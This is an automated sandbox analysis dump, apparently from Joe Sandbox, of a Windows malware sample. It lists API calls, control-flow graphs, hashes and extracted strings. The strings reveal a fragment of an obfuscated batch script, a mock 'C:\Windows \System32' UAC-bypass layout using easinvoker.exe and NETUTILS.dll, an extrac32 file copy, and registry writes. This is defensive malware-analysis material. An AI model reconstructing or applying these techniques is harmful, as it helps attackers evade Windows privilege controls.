  • Part of subcall function 0299C3F8: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0299C4CA), ref: 0299C437
  • Part of subcall function 0299C3F8: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0299C471
  • Part of subcall function 0299C3F8: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0299C49E
  • Part of subcall function 0299C3F8: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0299C4A7
  • Part of subcall function 02987E18: GetFileAttributesA.KERNEL32(00000000,?,0299E0EE,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,UacInitialize), ref: 02987E23
• Sleep.KERNEL32(00001770,UacScan,029E4344,029A8FEC,ScanString,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,ScanBuffer,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC), ref: 029A3094
                                                                                                                              • Part of subcall function 0299C368: RtlInitUnicodeString.N(?,?,00000000,0299C3E2), ref: 0299C390
                                                                                                                              • Part of subcall function 0299C368: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3A6
                                                                                                                              • Part of subcall function 0299C368: NtDeleteFile.N(?,00000000,?,00000000,00000000,?,?,00000000,0299C3E2), ref: 0299C3C5
                                                                                                                            • WinExec.KERNEL32(00000000,029A953C), ref: 029A436D
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: FilePath$NameName_$AddressAttributesCloseCreateDeleteExecHandleInitLibraryLoadModuleProcSleepStringUnicodeWrite
                                                                                                                            • String ID: .url$@echo offset "Nnqr=set "%Nnqr%"njyC=="%Nnqr%"qkMvMLsfma%njyC%http"%Nnqr%"dbvWEsxWns%njyC%rem "%Nnqr%"NpzRZtRBVV%njyC%Cloa"%Nnqr%"ftNVZzSZxa%njyC%/Bat"%Nnqr%"TwupSEtIWD%njyC%gith"%Nnqr%"yIGacXULig%njyC%k"%Nnqr%"uGlGnqCSun%njyC%h2sh"%Nnqr%"FU$C:\Users\Public\$C:\Users\Public\alpha.exe$C:\Windows \System32\NETUTILS.dll$C:\Windows \System32\aaa.bat$C:\Windows \System32\easinvoker.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows\\System32\\extrac32.exe /C /Y $CO.bat$HotKey=$IconIndex=$Initialize$O.bat$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$[InternetShortcut]$er.e$s.d
                                                                                                                            • API String ID: 102611719-1347945576
                                                                                                                            • Opcode ID: 5a8b51f5b2636c78e4e079fb3299e1098722b3f5ab16a34f49f9003ddf9cb3d6
                                                                                                                            • Instruction ID: 87d137767a65e2ac38ca743ae2ab5faad2b57a40f5d90ff14318df91e4438d6e
                                                                                                                            • Opcode Fuzzy Hash: 5a8b51f5b2636c78e4e079fb3299e1098722b3f5ab16a34f49f9003ddf9cb3d6
                                                                                                                            • Instruction Fuzzy Hash: 9153E931A5025ADFEF60FB64D890E9D73B6BFC9704F1454A6A009AB650DF70AE81CF90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
                                                                                                                            control_flow_graph 10531 29a4efe-29a53da call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 2984964 call 2984698 call 299d318 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 10668 29a53e0-29a565b call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 10531->10668 10669 29a53db call 2997be8 10531->10669 10742 29a6190-29a638f call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 
10668->10742 10743 29a5661-29a5cb3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29847b0 call 2984964 WinExec call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984964 call 2984698 call 2999e70 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2983694 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 10668->10743 10669->10668 10860 29a6b54-29a6cd7 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29848b0 10742->10860 10861 29a6395-29a69b4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 
call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2982ee0 call 2982f08 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 GetCurrentProcess call 2997968 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 10742->10861 11306 29a5cba-29a5f98 call 2995aa8 call 2984b90 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29849bc RtlMoveMemory call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299a1c0 call 29836c4 10743->11306 11307 29a5cb5-29a5cb8 10743->11307 10995 29a74a8-29a8b96 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 
call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 * 16 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 
call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984698 * 2 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 ExitProcess 10860->10995 10996 29a6cdd-29a6cec call 29848b0 10860->10996 11561 29a69bb-29a6b4f call 29849bc call 299c5bc call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 EnumSystemLocalesA 10861->11561 11562 29a69b6-29a69b9 10861->11562 10996->10995 11007 29a6cf2-29a6fc5 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299d198 call 2984824 call 2984964 
call 2984698 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2987e18 10996->11007 11332 29a6fcb-29a729d call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 299c74c call 29844f4 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984da4 * 2 call 2984728 call 299c3f8 11007->11332 11333 29a72a2-29a74a3 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 2984824 call 2984964 call 2984698 call 29847b0 call 2984964 call 2984698 call 2997be8 call 29849bc call 2997f48 11007->11333 11307->11306 11332->11333 11333->10995 11561->10860 11562->11561
APIs
  • Part of subcall function 02997BE8: LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
  • Part of subcall function 02997BE8: GetModuleHandleW.KERNEL32(?,?,00000000,02997C9A), ref: 02997C1E
  • Part of subcall function 02997BE8: GetProcAddress.KERNEL32(00000000,00000000), ref: 02997C37
  • Part of subcall function 0299D318: RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
  • Part of subcall function 0299D318: RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
  • Part of subcall function 0299D318: RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
• WinExec.KERNEL32(00000000,00000000), ref: 029A57F9
  • Part of subcall function 02999E70: CompareStringA.KERNEL32(00000400,00000001,00000000,?,00000000), ref: 02999F33
• RtlMoveMemory.N(00000000,?,00000000,?,ScanBuffer,029E4344,029A8FEC,UacScan,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC,OpenSession,029E4344,029A8FEC), ref: 029A5D7B
Strings
Memory Dump Source
• Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_2980000_uc.jbxd
Yara matches
Similarity
• API ID: AddressCloseCompareExecHandleLibraryLoadMemoryModuleMoveOpenProcStringValue
• String ID: C:\Users\Public\$C:\Windows\System32\$Initialize$OpenSession$ScanBuffer$ScanString$UacInitialize$UacScan
• API String ID: 897696978-872072817
• Opcode ID: e557639441c446610311af995688a77c9df4cede86129f636780ad68d9dc2512
• Instruction ID: ea48897f8cd1869da9db613a82d6fa4219d229abb630351495674bd5782cbe6a
• Opcode Fuzzy Hash: e557639441c446610311af995688a77c9df4cede86129f636780ad68d9dc2512
• Instruction Fuzzy Hash: 59921934A1025ADFDF20FB64D890ADD73B7BFC9704F1494A5A149AB654DBB0AE81CF80
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
[Control-flow graph rendering not reproduced; graph of the function whose entry block is 2981724-2981736. API calls labelled in its blocks: VirtualAlloc, Sleep.]
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?,02982000), ref: 029817D0
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?,02982000), ref: 029817E6
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
                                                                                                                            • Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            • Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: 96d595491d5c556a137e1c1d48fb77f0152f930cb68b86b8ccc750fa72649a0a
                                                                                                                            • Instruction ID: efed7afbd6c55cb84755ded349d33e27a2b572a686cd63a1ae6c51b34194c8e5
                                                                                                                            • Opcode Fuzzy Hash: 96d595491d5c556a137e1c1d48fb77f0152f930cb68b86b8ccc750fa72649a0a
                                                                                                                            • Instruction Fuzzy Hash: 21B122B6A05351CBCB15DF68E880365BBE1EB85324F1C86AED44D8F385D7719893CB90
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • GetModuleHandleA.KERNEL32(kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B61
                                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32), ref: 02997B67
                                                                                                                            • VirtualProtect.KERNEL32(?,?,?,?,00000000,kernel32,00000000,00000000,02997BA5,?,?,00000000,00000000), ref: 02997B81
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: AddressHandleModuleProcProtectVirtual
                                                                                                                            • String ID: irtualProtect$kernel32
                                                                                                                            • API String ID: 2099061454-2063912171
                                                                                                                            • Opcode ID: e58f4d2d1f5432e0d5535a3c3aaddc3ba23d3bf1750b84bfd56b92d4dc451103
                                                                                                                            • Instruction ID: e4fc19fbe26b41a2f928cc5677700bc00483091d50b4713b3a58a294fd8a01db
                                                                                                                            • Opcode Fuzzy Hash: e58f4d2d1f5432e0d5535a3c3aaddc3ba23d3bf1750b84bfd56b92d4dc451103
                                                                                                                            • Instruction Fuzzy Hash: B90184B5600348AFEB04FFE8DC41E9EB7EDEB88720F554454F514E7680DA34EA108A24
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

Control-flow Graph

• Graph with entry block 2981a8c (blocks 2981a8c through 2981c66, plus the tail 29816e8 through 2981723). The rendered graph and its executed/not-executed block colouring are not reproduced in this text; what the node list preserves is that the function calls Sleep (blocks 2981b13, 2981b2d, 2981b4b and 2981b61), VirtualFree (blocks 29816e8 and 2981c00) and the sub-functions at 2981644, 29814c0, 2981500 and 2981560.
                                                                                                                            APIs
                                                                                                                            • Sleep.KERNEL32(00000000,?), ref: 02981B17
                                                                                                                            • Sleep.KERNEL32(0000000A,00000000,?), ref: 02981B31
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: Sleep
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 3472027048-0
                                                                                                                            • Opcode ID: f547f121e57f471bd19e28699c43875414399bb3c0d0c254c96f258620f5ffe5
                                                                                                                            • Instruction ID: 2ae0205a693bb6015a63411f6dc4e758e6195e40d39f5f96178ac2cc7c449e59
                                                                                                                            • Opcode Fuzzy Hash: f547f121e57f471bd19e28699c43875414399bb3c0d0c254c96f258620f5ffe5
                                                                                                                            • Instruction Fuzzy Hash: 6851C071A052408FDB15EF6CD984766BBD8AF85324F1C85AED44CCF286E770D886CBA1
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Control-flow Graph

                                                                                                                            APIs
                                                                                                                            • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 0299C9EA
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CheckConnectionInternet
                                                                                                                            • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                                            • API String ID: 3847983778-3852638603
                                                                                                                            • Opcode ID: a5152eb22be28d2a2eeac7f5f3499d3da88e03b69144143a9a0ff072a7feacf5
                                                                                                                            • Instruction ID: 467471d48cf0c1b711341618e09d6570468b72d539aa4002cb71bda65c2e8d1e
                                                                                                                            • Opcode Fuzzy Hash: a5152eb22be28d2a2eeac7f5f3499d3da88e03b69144143a9a0ff072a7feacf5
                                                                                                                            • Instruction Fuzzy Hash: ED41FB31B112499BEF10FBA8DC41ADEB7FAEFC8714F645426E041B7240DA75AD018F60
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D30,?,?,029938BC,00000001), ref: 02995C44
                                                                                                                            • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02995D30,?,?,029938BC,00000001), ref: 02995C72
                                                                                                                              • Part of subcall function 02987D18: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,029938BC,02995CB2,00000000,02995D30,?,?,029938BC), ref: 02987D66
                                                                                                                              • Part of subcall function 02987F54: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,029938BC,02995CCD,00000000,02995D30,?,?,029938BC,00000001), ref: 02987F73
                                                                                                                            • GetLastError.KERNEL32(00000000,02995D30,?,?,029938BC,00000001), ref: 02995CD7
                                                                                                                              • Part of subcall function 0298A734: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,0298C395,00000000,0298C3EF), ref: 0298A753
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 503785936-0
                                                                                                                            • Opcode ID: d2de2fd91c295bfbcf30b5769d4df5f95b2633a9b367756e5d4b4c8b4554363a
                                                                                                                            • Instruction ID: 81778ee3827784f26aee09c532d443dd158a606fc2c48e756327ddd98cc0d885
                                                                                                                            • Opcode Fuzzy Hash: d2de2fd91c295bfbcf30b5769d4df5f95b2633a9b367756e5d4b4c8b4554363a
                                                                                                                            • Instruction Fuzzy Hash: 75318130A042089FDF01EFB8C881BEEBBF6AF88714F958465E504AB380D7755A05CFA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
                                                                                                                            • RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
                                                                                                                            • RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 779948276-0
                                                                                                                            • Opcode ID: fa12d0fbb7ef6fda11ce7b23452403336953ba3fbba57f61caf3d159932342fc
                                                                                                                            • Instruction ID: fec4b15afe85c295871641739876a4668574b1d43b8ad3977c59ea8a0c152c7b
                                                                                                                            • Opcode Fuzzy Hash: fa12d0fbb7ef6fda11ce7b23452403336953ba3fbba57f61caf3d159932342fc
                                                                                                                            • Instruction Fuzzy Hash: DE111970A14205AFEF10FBA8D88296E77FDEF89714F565460B508DB650D632E9008A50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • RegOpenKeyA.ADVAPI32(?,00000000,029E4798), ref: 0299D35C
                                                                                                                            • RegSetValueExA.ADVAPI32(0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D394
                                                                                                                            • RegCloseKey.ADVAPI32(0000083C,0000083C,00000000,00000000,00000001,00000000,0000001C,00000000,0299D3C7), ref: 0299D39F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000013.00000002.1503198391.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02980000, based on PE: true
• Associated: 00000013.00000002.1503169054.0000000002980000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000013.00000002.1503584552.00000000029AB000.00000004.00001000.00020000.00000000.sdmp
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_19_2_2980000_uc.jbxd
                                                                                                                            Yara matches
                                                                                                                            Similarity
                                                                                                                            • API ID: CloseOpenValue
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 779948276-0
                                                                                                                            • Opcode ID: 2f1ed3571de10b49a6d0f46039131623bfb49b0efe8e05a3e118e7d795161d5f
                                                                                                                            • Instruction ID: 5bfbaab0812bd106c0d8dda4c97a560706e26f069b8c047b98b1d9dec8ee409d
                                                                                                                            • Opcode Fuzzy Hash: 2f1ed3571de10b49a6d0f46039131623bfb49b0efe8e05a3e118e7d795161d5f
                                                                                                                            • Instruction Fuzzy Hash: B4111970A14205AFDF10FBA8D88296E77FDEF89714F565460B508DB650D632E9008A50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            APIs
                                                                                                                            • LoadLibraryW.KERNEL32(?,00000000,02997C9A), ref: 02997C18
